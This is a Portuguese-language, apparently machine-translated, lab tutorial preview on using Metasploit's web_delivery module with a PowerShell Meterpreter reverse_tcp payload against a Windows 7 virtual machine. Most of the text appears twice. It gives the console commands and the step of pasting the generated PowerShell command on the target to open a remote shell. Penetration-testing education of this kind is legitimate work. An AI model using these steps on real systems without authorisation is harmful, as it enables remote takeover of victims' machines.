Entrega WEB
Nesta seção, vamos aprender a usar a Web Entrega explorar módulo. Nós estaremos usando Metasploit e nosso Windows 7 VM como o destino.
Vamos começar!
1. A partir de uma Kali terminal, digite "msfconsole":
2. Agora digite:
Observe que temos 3 opções, Python, PHP e PSH (PowerShell). Nós estaremos atacando um sistema Windows, por isso vamos usar o PowerShell.
4. Enter, “set target 2”
5. Defina payload, “set payload windows/meterpreter/reverse_tcp”
6. Você pode verificar que tudo parece bem com “show options”:
7. Agora digite "exploit":
Isso inicia um servidor que hospeda o nosso ouvinte carga útil e aguarda uma conexão de entrada. Tudo o que precisamos fazer é executar o comando PowerShell gerado em nosso sistema de destino.
8. No sistema Windows 7, abra um prompt de comando e cole no e executar o comando PowerShell:
E depois de alguns segundos, você deverá ver:
Uma sessão meterpreter aberto!
9. Agora, tipo, "sessions" para listar as sessões ativas
10. Ligue para ele com "sessões -i 1"
Temos agora um shell Meterpreter completo para o alvo:
Digite "exit" para sair da sessão ativa e "exit" novamente para sair do Metasploit.
Nesta seção, vamos aprender a usar a Web Entrega explorar módulo. Nós estaremos usando Metasploit e nosso Windows 7 VM como o destino.
Vamos começar!
1. A partir de uma Kali terminal, digite "msfconsole":

2. Agora digite:
- use exploit / multi / script / web_delivery
- definir lhost [Endereço IP Kali]
- definir lport 4444

Observe que temos 3 opções, Python, PHP e PSH (PowerShell). Nós estaremos atacando um sistema Windows, por isso vamos usar o PowerShell.
4. Enter, “set target 2”
5. Defina payload, “set payload windows/meterpreter/reverse_tcp”
6. Você pode verificar que tudo parece bem com “show options”:

7. Agora digite "exploit":

Isso inicia um servidor que hospeda o nosso ouvinte carga útil e aguarda uma conexão de entrada. Tudo o que precisamos fazer é executar o comando PowerShell gerado em nosso sistema de destino.
8. No sistema Windows 7, abra um prompt de comando e cole no e executar o comando PowerShell:

E depois de alguns segundos, você deverá ver:

Uma sessão meterpreter aberto!
9. Agora, tipo, "sessions" para listar as sessões ativas
10. Ligue para ele com "sessões -i 1"

Temos agora um shell Meterpreter completo para o alvo:

Digite "exit" para sair da sessão ativa e "exit" novamente para sair do Metasploit.
Espero que tenham gostado deste capítulo seção de visualização. No capítulo completo, eu mostro como Entrega Web pode ser configurado para trabalhar contra sistemas Linux e Mac também.
Além disso, no capítulo Msfvenom você também vai ver como fazer conchas
de executável autônomos que não exigem o alvo para abrir um prompt de
comando em seu sistema e executar o código manualmente.